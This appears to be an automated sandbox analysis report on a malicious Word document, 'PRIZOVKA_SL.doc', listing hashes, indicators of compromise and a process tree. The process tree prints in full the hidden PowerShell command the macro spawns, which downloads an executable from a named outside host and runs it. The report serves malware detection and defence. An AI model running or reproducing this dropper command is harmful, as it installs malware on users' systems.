ad55de0ba082e1d0ba31f608e222d5dc9bae470bbc427b21801a37aab7309aa9

Analysis

max time kernel
137s
max time network
122s
platform
windows7_x64
resource
win7v200430
submitted
13/07/2020, 11:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PRIZOVKA_SL.doc
Size

54KB
MD5

a333fc51570e37262cb4d03305bfb591
SHA1

f6e9b39410615ebc9f633f2aa803c48118a02e0b
SHA256

ad55de0ba082e1d0ba31f608e222d5dc9bae470bbc427b21801a37aab7309aa9
SHA512

26124376a5fb52b6bb63c3947a3635f4e19b479ff987f215d6e87d062706f06715ec076c9fe411c6ec0ff24b7835bd1b4eb60f2f8b1616f0a1228ff65518effb

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://fgs.elpadrino.xyz:2095/lado/4.exe

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1312	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1068	1312	cmd.exe	23

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1312 wrote to memory of 1068	1312	WINWORD.EXE	24
PID 1312 wrote to memory of 1068	1312	WINWORD.EXE	24
PID 1312 wrote to memory of 1068	1312	WINWORD.EXE	24
PID 1068 wrote to memory of 1528	1068	cmd.exe	26
PID 1068 wrote to memory of 1528	1068	cmd.exe	26
PID 1068 wrote to memory of 1528	1068	cmd.exe	26

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1528	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1528	powershell.exe

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE
1312	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1528	powershell.exe
1528	powershell.exe

Blacklisted process makes network request 1 IoCs

flow	pid	Process
4	1528	powershell.exe

Office loads VBA resources, possible macro or embedded object present

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PRIZOVKA_SL.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:1312
- C:\Windows\system32\cmd.exe
  cmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://fgs.elpadrino.xyz:2095/lado/4.exe',$env:Temp+'\dksll.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\dksll.exe')
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://fgs.elpadrino.xyz:2095/lado/4.exe',$env:Temp+'\dksll.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\dksll.exe')
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    PID:1528

Windows 7 deprecation

Loading Replay Monitor...

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads